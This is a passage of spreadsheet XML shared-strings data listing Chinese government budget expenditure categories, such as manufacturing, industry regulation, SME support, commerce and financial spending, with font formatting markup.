        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>黑色金属矿勘探和采选</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>有色金属矿勘探和采选</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>非金属矿勘探和采选</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他资源勘探业支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>制造业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>纺织业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>医药制造业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>非金属矿物制品业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>通信设备、计算机及其他电子设备制造业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>交通运输设备制造业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>电气机械及器材制造业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>工艺品及其他制造业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>石油加工、炼焦及核燃料加工业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>化学原料及化学制品制造业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>黑色金属冶炼及压延加工业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>有色金属冶炼及压延加工业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他制造业支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>建筑业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他建筑业支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>工业和信息产业监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>战备应急</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专用通信</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>无线电及信息通信监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>工程建设及运行维护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>产业发展</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他工业和信息产业监管支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有资产监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有企业监事会专项</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中央企业专项管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他国有资产监管支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>支持中小企业发展和管理支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科技型中小企业技术创新基金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中小企业发展专项</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>减免房租补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他支持中小企业发展和管理支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他资源勘探工业信息等支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>黄金事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>技术改造支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中药材扶持资金支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>重点产业振兴和技术改造项目贷款贴息</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他资源勘探工业信息等支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>商业服务业等支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>商业流通事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>食品流通安全补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>市场监测及信息管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>民贸企业补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>民贸民品贷款贴息</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他商业流通事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>涉外发展服务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>外商投资环境建设补助资金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他涉外发展服务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他商业服务业等支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>服务业基础设施建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他商业服务业等支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>金融支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>金融部门行政支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>安全防卫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>金融部门其他行政支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>金融部门监管支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>货币发行</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>金融服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>反假币</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>重点金融机构监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>金融稽查与案件处理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>金融行业电子化建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>从业人员资格考试</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>反洗钱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>金融部门其他监管支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>金融发展支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>政策性银行亏损补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>利息费用补贴支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>补充资本金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>风险基金补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他金融发展支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>金融调控支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中央银行亏损补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他金融调控支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他金融支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>重点企业贷款贴息</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他金融支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>援助其他地区支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>一般公共服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>文化旅游体育与传媒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>卫生健康</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>节能环保</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>交通运输</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>住房保障</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
